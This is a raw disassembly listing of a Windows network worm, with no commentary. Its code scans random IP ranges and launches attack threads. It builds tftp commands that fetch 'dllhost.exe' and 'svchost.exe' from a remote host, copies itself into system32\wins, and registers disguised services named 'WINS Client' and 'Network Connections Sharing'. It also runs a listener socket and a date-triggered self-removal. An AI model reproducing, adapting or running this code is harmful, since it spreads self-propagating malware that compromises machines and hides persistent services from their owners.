; File Name : u:\startupscripts\work\hiddencode.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 401000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
sub_401000 proc near ; CODE XREF: sub_402A00 + D
; DATA XREF: sub_40B95B + 13Dr ...
var_230 = dword ptr - 230h
var_22C = byte ptr - 22Ch
var_228 = dword ptr - 228h
var_20C = byte ptr - 20Ch
var_108 = byte ptr - 108h
var_107 = byte ptr - 107h
arg_0 = dword ptr 4
sub esp, 230h
loc_401006: ; DATA XREF: seg002:0040B88E
push ebp
push esi
push edi
mov ecx, 41h
xor eax, eax
lea edi, [ esp + 23Ch + var_107 ]
mov [ esp + 23Ch + var_108 ], 0
lea edx, [ esp + 23Ch + var_108 ]
rep stosd
mov edi, [ esp + 23Ch + arg_0 ]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov [ esp + 23Ch + var_230 ], 0
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
push eax
rep movsb
mov ecx, 49h
lea edi, [ esp + 240h + var_22C ]
rep stosd
push 2
call sub_403134 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_4010E7
lea ecx, [ esp + 23Ch + var_230 ]
mov [ esp + 23Ch + var_230 ], 128h
push ecx
push edi
call sub_40312E ; Process32First
test eax, eax
jz short loc_4010E0
mov esi, dword_404120
mov ebp, dword_404140
loc_401091: ; CODE XREF: sub_401000 + C9
lea edx, [ esp + 23Ch + var_20C ]
push 2Eh
push edx
call esi ; dword_404120
add esp, 8
test eax, eax
jz short loc_4010A4
mov byte ptr [ eax ], 0
loc_4010A4: ; CODE XREF: sub_401000 + 9F
lea eax, [ esp + 23Ch + var_108 ]
lea ecx, [ esp + 23Ch + var_20C ]
push eax
push ecx
call ebp ; dword_404140
add esp, 8
test eax, eax
jz short loc_4010CB
lea edx, [ esp + 23Ch + var_230 ]
push edx
push edi
call sub_403128 ; Process32Next
test eax, eax
jz short loc_4010E0
jmp short loc_401091
; ---------------------------------------------------------------------------
loc_4010CB: ; CODE XREF: sub_401000 + B8
push edi
call dword_4040E0 ; CloseHandle
mov eax, [ esp + 23Ch + var_228 ]
pop edi
pop esi
pop ebp
add esp, 230h
retn
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: sub_401000 + 83
; sub_401000 + C7
push edi
call dword_4040E0 ; CloseHandle
loc_4010E7: ; CODE XREF: sub_401000 + 6C
pop edi
pop esi
xor eax, eax
pop ebp
add esp, 230h
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
sub_401100 proc near ; CODE XREF: sub_401470 + 38
var_2 = byte ptr - 2
var_1 = byte ptr - 1
push ecx
push ebx
push esi
mov esi, dword_40413C
call esi ; dword_40413C
cdq
mov ecx, 11h
idiv ecx
cmp edx, 0Eh
jnz short loc_40112E
call esi ; dword_40413C
mov ebx, eax
and ebx, 80000003h
jns short loc_401129
dec ebx
loc_401125: ; DATA XREF: sub_40A32A + 7r
or ebx, 0FFFFFFFCh
inc ebx
loc_401129: ; CODE XREF: sub_401100 + 22
add bl, 3Fh
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40112E: ; CODE XREF: sub_401100 + 16
cmp edx, 0Fh
jnz short loc_401144
call esi ; dword_40413C
cdq
mov ecx, 2Dh
idiv ecx
mov ebx, edx
add bl, 80h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_401144: ; CODE XREF: sub_401100 + 31
cmp edx, 10h
jnz short loc_40115A
call esi ; dword_40413C
cdq
mov ecx, 9
idiv ecx
mov ebx, edx
loc_401155: ; DATA XREF: sub_40A2D7 + 1Dr
sub bl, 40h
jmp short loc_401160
; ---------------------------------------------------------------------------
loc_40115A: ; CODE XREF: sub_401100 + 47
mov bl, byte_405BA4[ edx ]
loc_401160: ; CODE XREF: sub_401100 + 2C
; sub_401100 + 42 ...
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401170
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401170: ; CODE XREF: sub_401100 + 67
mov [ esp + 0Ch + var_2 ], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401184
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401184: ; CODE XREF: sub_401100 + 7B
mov [ esp + 0Ch + var_1 ], al
call esi ; dword_40413C
and eax, 800000FFh
jns short loc_401198
dec eax
or eax, 0FFFFFF00h
inc eax
loc_401198: ; CODE XREF: sub_401100 + 8F
xor edx, edx
xor ecx, ecx
mov ch, [ esp + 0Ch + var_1 ]
mov dh, bl
mov dl, [ esp + 0Ch + var_2 ]
and eax, 0FFh
shl edx, 10h
or eax, edx
and ecx, 0FFFFh
pop esi
or eax, ecx
pop ebx
pop ecx
retn
sub_401100 endp
; ---------------------------------------------------------------------------
align 10h
sub_4011C0 proc near ; CODE XREF: seg000:004030AA
arg_0 = dword ptr 4
arg_4 = dword ptr 8
call dword_4040CC ; FreeConsole
call sub_4027B0
test eax, eax
jnz short locret_4011FB
push 104h
push offset aCWindowsSystem ; \"C:\\WINDOWS\\system32\"
call dword_4040D0 ; GetSystemDirectoryA
call sub_402730
sub eax, 2
jz short loc_4011FC
mov eax, [ esp + arg_4 ]
mov ecx, [ esp + arg_0 ]
push eax
push ecx
call sub_4016D0
add esp, 8
locret_4011FB: ; CODE XREF: sub_4011C0 + D
retn
; ---------------------------------------------------------------------------
loc_4011FC: ; CODE XREF: sub_4011C0 + 27
jmp sub_4027E0
sub_4011C0 endp
; ---------------------------------------------------------------------------
align 10h
sub_401210 proc near ; CODE XREF: sub_401280 + AF
; sub_401280:loc_4013B1 ...
push esi
mov esi, dword_4040C8
loc_401217: ; CODE XREF: sub_401210 + 27
call sub_401E80
test eax, eax
jnz short loc_401230
loc_401220: ; CODE XREF: sub_401210 + 1E
push 927C0h
call esi ; dword_4040C8
call sub_401E80
test eax, eax
jz short loc_401220
loc_401230: ; CODE XREF: sub_401210 + E
call sub_401EA0
test eax, eax
jz short loc_401217
mov esi, dword_40411C
push offset dword_407478
push offset aTftpISGetDllho ; \"tftp - i %s get dllhost.exe wins\\DLLHOST\"...
push offset dword_4075A8
call esi ; dword_40411C
add esp, 0Ch
push offset dword_407478
push offset aTftpISGetSvcho ; \"tftp - i %s get svchost.exe wins\\SVCHOST\"...
push offset dword_407628
call esi ; dword_40411C
add esp, 0Ch
call sub_4020E0
call sub_402130
pop esi
retn
sub_401210 endp
; ---------------------------------------------------------------------------
align 10h
sub_401280 proc near ; CODE XREF: sub_4016D0 + A
; seg000:0040294F
var_1A0 = word ptr - 1A0h
var_194 = byte ptr - 194h
var_190 = byte ptr - 190h
sub esp, 1A4h
lea eax, [ esp + 1A4h + var_190 ]
push eax
push 202h
call dword_40418C ; WSAStartup
test eax, eax
jnz loc_401359
call sub_402A00
lea ecx, [ esp + 1A4h + var_1A0 ]
push ecx
call dword_4040B8 ; GetLocalTime
cmp [ esp + 1A4h + var_1A0 ], 7D4h
jnz short loc_4012DB
push offset aRpcpatch ; \"RpcPatch\"
call sub_402F00
push offset aRpctftpd ; \"RpcTftpd\"
call sub_402F00
add esp, 8
call sub_402970
push 1
call dword_4040BC ; ExitProcess
loc_4012DB: ; CODE XREF: sub_401280 + 35
push ebx
push ebp
push esi
push edi
call dword_4040C0 ; GetTickCount
push eax
call dword_404104 ; srand
mov esi, dword_4040C8
mov ecx, 10h
mov eax, 0AAAAAAAAh
mov edi, offset dword_406430
add esp, 4
rep stosd
loc_401306: ; CODE XREF: sub_401280 + A3
push 109A0h
call sub_402FC0
add esp, 4
mov ds:dword_4075A0, eax
push 64h
call esi ; dword_4040C8
mov eax, ds:dword_4075A0
test eax, eax
jz short loc_401306
call sub_401F30
call sub_402170
call sub_401210
call sub_401780
lea edx, [ esp + 1A4h + var_194 ]
push edx
push 0
push 0
push offset sub_401990
push 0
push 0
call dword_4040C4 ; CreateThread
test eax, eax
jnz short loc_401360
pop edi
pop esi
pop ebp
pop ebx
loc_401359: ; CODE XREF: sub_401280 + 18
add esp, 1A4h
retn
; ---------------------------------------------------------------------------
loc_401360: ; CODE XREF: sub_401280 + D3
push eax
call dword_4040E0 ; CloseHandle
push offset aRpctftpd ; \"RpcTftpd\"
call sub_402540
add esp, 4
test eax, eax
jnz short loc_401398
push 3E8h
call esi ; dword_4040C8
call sub_4015E0
push 3E8h
call esi ; dword_4040C8
push offset aRpctftpd ; \"RpcTftpd\"
call sub_402540
add esp, 4
loc_401398: ; CODE XREF: sub_401280 + F6
push 7D0h
call esi ; dword_4040C8
mov ebx, dword_404190
mov ebp, dword_404194
mov edi, dword_40413C
loc_4013B1: ; CODE XREF: sub_401280 + 1DE
call sub_401210
push offset dword_407478
call ebp ; dword_404194
push eax
call ebx ; dword_404190
mov esi, eax
push 0
and esi, 0FFFF0000h
push 0
push 1
push esi
call sub_401470
add esp, 10h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_4013EA
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_4013EA: ; CODE XREF: sub_401280 + 163
jz short loc_4013F4
add esi, 10000h
jmp short loc_4013FA
; ---------------------------------------------------------------------------
loc_4013F4: ; CODE XREF: sub_401280:loc_4013EA
sub esi, 30000h
loc_4013FA: ; CODE XREF: sub_401280 + 172
push 0
push 0
push 3
push esi
call sub_401470
call sub_401210
call edi ; dword_40413C
cdq
mov ecx, 4Ch
xor esi, esi
idiv ecx
push 1
push 0
push 1
mov si, word_40537C[ edx * 2 ]
shl esi, 10h
push esi
call sub_401470
add esp, 20h
call sub_401210
call edi ; dword_40413C
and eax, 80000001h
jns short loc_401444
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_401444: ; CODE XREF: sub_401280 + 1BD
jz short loc_40144A
push 0
jmp short loc_40144C
; ---------------------------------------------------------------------------
loc_40144A: ; CODE XREF: sub_401280:loc_401444
push 1
loc_40144C: ; CODE XREF: sub_401280 + 1C8
; DATA XREF: sub_40B95B + 31Br
push 1
push 1
push esi
call sub_401470
add esp, 10h
call sub_402A00
jmp loc_4013B1
sub_401280 endp
; ---------------------------------------------------------------------------
align 10h
sub_401470 proc near ; CODE XREF: sub_401280 + 14F
; sub_401280 + 181 ...
var_C = dword ptr - 0Ch
var_8 = dword ptr - 8
var_4 = dword ptr - 4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 0Ch
push ebx
push ebp
mov ebp, dword_4040C8
push esi
mov esi, [ esp + 18h + arg_4 ]
push edi
shl esi, 10h
xor edi, edi
xor ebx, ebx
test esi, esi
mov [ esp + 1Ch + var_8 ], 1
mov [ esp + 1Ch + var_C ], ebx
mov [ esp + 1Ch + var_4 ], esi
jle loc_4015C7
loc_4014A0: ; CODE XREF: sub_401470 + 151
mov eax, [ esp + 1Ch + arg_8 ]
test eax, eax
jz short loc_4014B1
call sub_401100
mov ebx, eax
jmp short loc_4014B7
; ---------------------------------------------------------------------------
loc_4014B1: ; CODE XREF: sub_401470 + 36
mov eax, [ esp + 1Ch + arg_0 ]
add ebx, eax
loc_4014B7: ; CODE XREF: sub_401470 + 3F
cmp bl, 0C5h
jz loc_4015B6
mov ecx, ebx
shr ecx, 8
cmp cl, 0C5h
jz loc_4015B6
mov eax, ebx
shr eax, 10h
cmp al, 0C5h
jz loc_4015B6
mov edx, ebx
shr edx, 18h
cmp dl, 0C5h
jz loc_4015B6
cmp bx, 9999h
jz loc_4015B6
cmp cx, 9999h
jz loc_4015B6
cmp ax, 9999h
jz loc_4015B6
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jnz short loc_40152D
push 64h
call ebp ; dword_4040C8
push 4
call sub_402FC0
mov esi, eax
add esp, 4
test esi, esi
jz short loc_401575
loc_40152D: ; CODE XREF: sub_401470 + A7
test edi, edi
jz short loc_401538
push edi
call dword_4040E0 ; CloseHandle
loc_401538: ; CODE XREF: sub_401470 + BF
push ebx
call dword_404188 ; ntohl
mov [ esi ], eax
mov eax, [ esp + 1Ch + arg_C ]
test eax, eax
jz short loc_401558
lea eax, [ esp + 1Ch + arg_4 ]
push eax
push 0
push esi
push offset sub_402C40
jmp short loc_401565
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401470 + D7
lea ecx, [ esp + 1Ch + arg_4 ]
push ecx
push 0
push esi
push offset sub_402B20
loc_401565: ; CODE XREF: sub_401470 + E6
push 0
push 0
call dword_4040C4 ; CreateThread
push 2
mov edi, eax
call ebp ; dword_4040C8
loc_401575: ; CODE XREF: sub_401470 + BB
mov eax, [ esp + 1Ch + var_8 ]
test eax, eax
jz short loc_401596
cmp [ esp + 1Ch + var_C ], 12Ch
jl short loc_401596
push 7D0h
call ebp ; dword_4040C8
mov [ esp + 1Ch + var_8 ], 0
loc_401596: ; CODE XREF: sub_401470 + 10B
; sub_401470 + 115
cmp ds:dword_4075A4, 12Ch
jl short loc_4015B2
loc_4015A2: ; CODE XREF: sub_401470 + 140
push 2
call ebp ; dword_4040C8
cmp ds:dword_4075A4, 12Ch
jge short loc_4015A2
loc_4015B2: ; CODE XREF: sub_401470 + 130
mov esi, [ esp + 1Ch + var_4 ]
loc_4015B6: ; CODE XREF: sub_401470 + 4A
; sub_401470 + 58 ...
mov ebx, [ esp + 1Ch + var_C ]
inc ebx
loc_4015BB: ; DATA XREF: sub_40B95B + F0r
cmp ebx, esi
mov [ esp + 1Ch + var_C ], ebx
jl loc_4014A0
loc_4015C7: ; CODE XREF: sub_401470 + 2A
push 0EA60h
call ebp ; dword_4040C8
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_401470 endp
; ---------------------------------------------------------------------------
align 10h
sub_4015E0 proc near ; CODE XREF: sub_401280 + FF
; sub_4016D0
var_208 = byte ptr - 208h
var_104 = byte ptr - 104h
sub esp, 208h
lea eax, [ esp + 208h + var_104 ]
push esi
mov esi, dword_40411C
push offset aCWindowsSystem ; \"C:\\WINDOWS\\system32\"
push offset aSDllcacheTftpd ; \"%s\\dllcache\\tftpd.exe\"
push eax
call esi ; dword_40411C
add esp, 0Ch
lea ecx, [ esp + 20Ch + var_208 ]
push offset aCWindowsSystem ; \"C:\\WINDOWS\\system32\"
push offset aSWinsSvchost_e ; \"%s\\wins\\svchost.exe\"
push ecx
call esi ; dword_40411C
add esp, 0Ch
lea edx, [ esp + 20Ch + var_208 ]
lea eax, [ esp + 20Ch + var_104 ]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aMsdtc ; \"MSDTC\"
push offset aSvchost_exe ; \"svchost.exe\"
push offset aNetworkConnect ; \"Network Connections Sharing\"
push offset aRpctftpd ; \"RpcTftpd\"
call sub_4023E0
add esp, 10h
pop esi
add esp, 208h
retn
sub_4015E0 endp
; ---------------------------------------------------------------------------
align 10h
sub_401660 proc near ; CODE XREF: sub_4016D0 + 5
var_20C = byte ptr - 20Ch
var_108 = byte ptr - 108h
sub esp, 20Ch
lea eax, [ esp + 20Ch + var_108 ]
push 104h
push eax
push 0
call dword_4040A8 ; GetModuleFileNameA
push offset aCWindowsSystem ; \"C:\\WINDOWS\\system32\"
lea ecx, [ esp + 210h + var_20C ]
push offset aSWinsDllhost_e ; \"%s\\wins\\DLLHOST.EXE\"
push ecx
call dword_40411C ; sprintf
add esp, 0Ch
lea edx, [ esp + 20Ch + var_20C ]
lea eax, [ esp + 20Ch + var_108 ]
push 0
push edx
push eax
call dword_4040B4 ; CopyFileA
push offset aBrowser ; \"Browser\"
push offset aDllhost_exe ; \"DLLHOST.EXE\"
push offset aWinsClient ; \"WINS Client\"
push offset aRpcpatch ; \"RpcPatch\"
call sub_4023E0
add esp, 21Ch
retn
sub_401660 endp
; ---------------------------------------------------------------------------
align 10h
sub_4016D0 proc near ; CODE XREF: sub_4011C0 + 33
call sub_4015E0
call sub_401660
jmp sub_401280
sub_4016D0 endp
; ---------------------------------------------------------------------------
align 10h
sub_4016E0 proc near ; CODE XREF: sub_401780:loc_4018BC
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [ esp + arg_0 ]
mov ecx, [ esp + arg_4 ]
push 0
push 0
push eax
push ecx
push 0
call sub_403110
neg eax
sbb eax, eax
inc eax
retn
sub_4016E0 endp
; ---------------------------------------------------------------------------
align 10h
sub_401700 proc near ; CODE XREF: sub_401780 + 16D
var_54 = dword ptr - 54h
var_44 = dword ptr - 44h
var_40 = dword ptr - 40h
var_3C = dword ptr - 3Ch
var_38 = dword ptr - 38h
var_34 = dword ptr - 34h
var_30 = dword ptr - 30h
var_2C = dword ptr - 2Ch
var_28 = dword ptr - 28h
var_18 = dword ptr - 18h
var_14 = word ptr - 14h
var_12 = word ptr - 12h
var_10 = dword ptr - 10h
arg_0 = dword ptr 4
sub esp, 54h
push edi
mov ecx, 11h
xor eax, eax
lea edi, [ esp + 58h + var_44 ]
rep stosd
lea ecx, [ esp + 58h + var_54 ]
lea edx, [ esp + 58h + var_44 ]
push ecx
mov ecx, [ esp + 5Ch + arg_0 ]
push edx
push eax
push eax
push eax
push eax
push eax
push eax
push ecx
push eax
mov [ esp + 80h + var_44 ], 44h
mov [ esp + 80h + var_40 ], eax
mov [ esp + 80h + var_38 ], eax
mov [ esp + 80h + var_3C ], eax
mov [ esp + 80h + var_28 ], eax
mov [ esp + 80h + var_2C ], eax
mov [ esp + 80h + var_30 ], eax
mov [ esp + 80h + var_34 ], eax
mov [ esp + 80h + var_14 ], ax
mov [ esp + 80h + var_10 ], eax
mov [ esp + 80h + var_12 ], ax
mov [ esp + 80h + var_18 ], 1
call dword_4040E4 ; CreateProcessA
mov ecx, [ esp + 58h + var_54 ]
pop edi
neg eax
sbb eax, eax
and eax, ecx
add esp, 54h
retn
sub_401700 endp
; ---------------------------------------------------------------------------
align 10h
sub_401780 proc near ; CODE XREF: sub_401280 + B4
var_C8 = dword ptr - 0C8h
var_C4 = dword ptr - 0C4h
var_C0 = dword ptr - 0C0h
var_BC = dword ptr - 0BCh
var_B8 = word ptr - 0B8h
var_B6 = byte ptr - 0B6h
var_B4 = byte ptr - 0B4h
sub esp, 0C8h
push esi
push edi
call sub_402310
mov edi, eax
test edi, edi
jz short loc_40179C
cmp edi, 1
jnz loc_4018C8
loc_40179C: ; CODE XREF: sub_401780 + 11
push edi
call sub_402390
add esp, 4
test eax, eax
jnz loc_4018C8
call dword_4040A0 ; GetOEMCP
mov esi, eax
call dword_4040A4 ; GetSystemDefaultLCID
mov ecx, eax
and ecx, 3FFh
shr ax, 0Ah
cmp esi, 1B5h
jnz short loc_4017E7
cmp cx, 9
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
xor eax, eax
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_4017E7: ; CODE XREF: sub_401780 + 4D
cmp esi, 3A8h
jnz short loc_40180A
cmp cx, 4
jnz loc_40192F
cmp ax, 2
jnz loc_40192F
mov eax, 1
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40180A: ; CODE XREF: sub_401780 + 6D
cmp esi, 3B6h
jnz short loc_40182D
cmp cx, 4
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 2
jmp short loc_40185E
; ---------------------------------------------------------------------------
loc_40182D: ; CODE XREF: sub_401780 + 90
cmp esi, 3A4h
jz loc_40192F
cmp esi, 3B5h
jnz loc_40192F
cmp cx, 12h
jnz loc_40192F
cmp ax, 1
jnz loc_40192F
mov eax, 3
loc_40185E: ; CODE XREF: sub_401780 + 65
; sub_401780 + 88 ...
mov ecx, dword_4061A8
mov edx, dword_4061AC
mov [ esp + 0D0h + var_C8 ], ecx
mov ecx, dword_4061B0
mov [ esp + 0D0h + var_C4 ], edx
mov edx, dword_4061B4
mov [ esp + 0D0h + var_C0 ], ecx
mov cx, word_4061B8
mov [ esp + 0D0h + var_BC ], edx
mov dl, byte_4061BA
test edi, edi
mov [ esp + 0D0h + var_B8 ], cx
mov [ esp + 0D0h + var_B6 ], dl
jnz short loc_4018AF
mov eax, off_405424[ eax * 4 ]
lea ecx, [ esp + 0D0h + var_C8 ]
push eax
push ecx
jmp short loc_4018BC
; ---------------------------------------------------------------------------
loc_4018AF: ; CODE XREF: sub_401780 + 11E
mov edx, off_405414[ eax * 4 ]
lea eax, [ esp + 0D0h + var_C8 ]
push edx
push eax
loc_4018BC: ; CODE XREF: sub_401780 + 12D
call sub_4016E0
add esp, 8
test eax, eax
jnz short loc_4018D3
loc_4018C8: ; CODE XREF: sub_401780 + 16
; sub_401780 + 27
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_4018D3: ; CODE XREF: sub_401780 + 146
lea ecx, [ esp + 0D0h + var_C8 ]
lea edx, [ esp + 0D0h + var_B4 ]
push ecx
loc_4018DC: ; DATA XREF: seg002:0040BC80
push offset aSNOZQ ; \"%s - n - o - z - q\"
push edx
call dword_40411C ; sprintf
lea eax, [ esp + 0DCh + var_B4 ]
push eax
call sub_401700
mov esi, eax
add esp, 10h
test esi, esi
jnz short loc_401904
pop edi
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_401904: ; CODE XREF: sub_401780 + 179
push 57E40h
push esi
call dword_4040B0 ; WaitForSingleObject
test eax, eax
jz short loc_40193A
push 1
push esi
call dword_4040AC ; TerminateProcess
push esi
call dword_4040E0 ; CloseHandle
lea ecx, [ esp + 0D0h + var_C8 ]
push ecx
call dword_4040E8 ; DeleteFileA
loc_40192F: ; CODE XREF: sub_401780 + 53
; sub_401780 + 5D ...
pop edi
xor eax, eax
pop esi
add esp, 0C8h
retn
; ---------------------------------------------------------------------------
loc_40193A: ; CODE XREF: sub_401780 + 192
push esi
call dword_4040E0 ; CloseHandle
mov esi, dword_4040C8
push 3A98h
call esi ; dword_4040C8
lea edx, [ esp + 0D0h + var_C8 ]
push edx
call dword_4040E8 ; DeleteFileA
push edi
call sub_402390
add esp, 4
test eax, eax
jz short loc_401977
push 2
call sub_4022A0
add esp, 4
push 4E20h
call esi ; dword_4040C8
loc_401977: ; CODE XREF: sub_401780 + 1E4
pop edi
mov eax, 1
pop esi
add esp, 0C8h
retn
sub_401780 endp
; ---------------------------------------------------------------------------
align 10h
sub_401990 proc near ; DATA XREF: sub_401280 + C2
var_28 = dword ptr - 28h
var_24 = byte ptr - 24h
var_20 = word ptr - 20h
var_1E = word ptr - 1Eh
var_1C = dword ptr - 1Ch
var_10 = byte ptr - 10h
sub esp, 28h
push ebx
push ebp
push esi
push edi
push 0
push 1
push 2
call dword_404150 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_401AFA
push 0
call dword_404188 ; ntohl
mov [ esp + 38h + var_20 ], 2
mov [ esp + 38h + var_1C ], eax
call dword_40413C ; rand
cdq
mov ecx, 64h
mov ebx, dword_404174
idiv ecx
mov ebp, dword_404178
add edx, 29Ah
xor esi, esi
loc_4019E3: ; CODE XREF: sub_401990 + 8F
add dx, si
xor eax, eax
mov al, dh
mov word_405B68, dx
cmp al, 0C5h
jz short loc_401A18
cmp dl, 0C5h
jz short loc_401A18
push edx
call ebx ; dword_404174
lea ecx, [ esp + 38h + var_20 ]
push 10h
push ecx
push edi
mov [ esp + 44h + var_1E ], ax
call ebp ; dword_404178
cmp eax, 0FFFFFFFFh
jnz short loc_401A21
mov dx, word_405B68
loc_401A18: ; CODE XREF: sub_401990 + 63
; sub_401990 + 68
inc esi
cmp esi, 3E8h
jl short loc_4019E3
loc_401A21: ; CODE XREF: sub_401990 + 7F
cmp esi, 3E8h
jnz short loc_401A37
call dword_40417C ; WSACleanup
push 1
call dword_4040BC ; ExitProcess
loc_401A37: ; CODE XREF: sub_401990 + 97
push 7D0h
push edi
loc_401A3D: ; DATA XREF: seg002:0040BABFr
call dword_404180 ; listen
cmp eax, 0FFFFFFFFh
jz loc_401AF3
lea edx, [ esp + 38h + var_28 ]
lea eax, [ esp + 38h + var_10 ]
push edx
push eax
push edi
mov [ esp + 44h + var_28 ], 10h
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_401AF3
mov ebp, dword_4040C8
mov ebx, dword_4040C4
loc_401A7C: ; CODE XREF: sub_401990 + 142
push 4
call sub_402FC0
add esp, 4
test eax, eax
jnz short loc_401A9C
push 0Ah
call ebp ; dword_4040C8
push 4
call sub_402FC0
add esp, 4
test eax, eax
jz short loc_401ABC
loc_401A9C: ; CODE XREF: sub_401990 + F8
lea ecx, [ esp + 38h + var_24 ]
mov [ eax ], esi
push ecx
push 0
push eax
push offset sub_401C80
push 0
push 0
call ebx ; dword_4040C4
test eax, eax
jz short loc_401AE7
push eax
call dword_4040E0 ; CloseHandle
loc_401ABC: ; CODE XREF: sub_401990 + 10A
lea edx, [ esp + 38h + var_28 ]
lea eax, [ esp + 38h + var_10 ]
push edx
push eax
push edi
call dword_404184 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401A7C
push edi
call dword_404170 ; closesocket
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
; ---------------------------------------------------------------------------
loc_401AE7: ; CODE XREF: sub_401990 + 123
cmp esi, 0FFFFFFFFh
jz short loc_401AF3
push esi
call dword_404170 ; closesocket
loc_401AF3: ; CODE XREF: sub_401990 + B6
; sub_401990 + DA ...
push edi
call dword_404170 ; closesocket
loc_401AFA: ; CODE XREF: sub_401990 + 18
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 28h
retn 4
sub_401990 endp
; ---------------------------------------------------------------------------
align 10h
sub_401B10 proc near ; CODE XREF: sub_401C80 + D8
; sub_401C80 + 121 ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [ esp + arg_4 ]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [ esp + 10h + arg_0 ]
push 0
not ecx
dec ecx
push ecx
push edx
push edi
call dword_404168 ; send
test eax, eax
jnz short loc_401B3C
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B3C: ; CODE XREF: sub_401B10 + 25
mov esi, [ esp + 10h + arg_8 ]
mov ebx, dword_40416C
push 0
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_401B7E
mov ebp, dword_404100
loc_401B5C: ; CODE XREF: sub_401B10 + 6C
push offset dword_4061BC
push esi
mov byte ptr [ eax + esi ], 0
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401B85
push eax
push 3FFh
push esi
push edi
call ebx ; dword_40416C
cmp eax, 0FFFFFFFFh
jnz short loc_401B5C
loc_401B7E: ; CODE XREF: sub_401B10 + 44
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B85: ; CODE XREF: sub_401B10 + 5D
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
retn
sub_401B10 endp
; ---------------------------------------------------------------------------
align 10h
sub_401B90 proc near ; CODE XREF: sub_401C80 + 162
; sub_401C80 + 192
var_4 = dword ptr - 4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
mov edx, [ esp + 4 + arg_4 ]
push ebx
push ebp
push esi
push edi
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov esi, [ esp + 14h + arg_0 ]
push 0
not ecx
dec ecx
push ecx
push edx
push esi
call dword_404168 ; send
test eax, eax
jz loc_401C64
lea eax, [ esp + 14h + var_4 ]
push 4
push eax
push 1006h
push 0FFFFh
push esi
mov [ esp + 28h + var_4 ], 15F90h
call dword_404164 ; setsockopt
mov ebx, dword_4040C0
call ebx ; dword_4040C0
mov edi, [ esp + 14h + arg_8 ]
push 0
push 1FFh
push edi
push esi
mov [ esp + 24h + arg_4 ], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
mov ecx, [ esp + 14h + arg_4 ]
mov ebp, eax
sub ebp, ecx
cmp esi, 0FFFFFFFFh
jz short loc_401C64
loc_401C0C: ; CODE XREF: sub_401B90 + D2
mov byte ptr [ esi + edi ], 0
mov esi, dword_404100
push offset aTransferSucces ; \"Transfer successful\"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C6C
push offset aTimeoutOccurre ; \"Timeout occurred\"
push edi
call esi ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401C64
cmp ebp, 15F2Ch
ja short loc_401C64
call ebx ; dword_4040C0
mov ecx, [ esp + 14h + arg_0 ]
push 0
push 1FFh
push edi
push ecx
mov [ esp + 24h + arg_4 ], eax
call dword_40416C ; recv
mov esi, eax
call ebx ; dword_4040C0
sub eax, [ esp + 14h + arg_4 ]
add ebp, eax
cmp esi, 0FFFFFFFFh
jnz short loc_401C0C
loc_401C64: ; CODE XREF: sub_401B90 + 26
; sub_401B90 + 7A ...
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_401C6C: ; CODE XREF: sub_401B90 + 93
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
pop ecx
retn
sub_401B90 endp
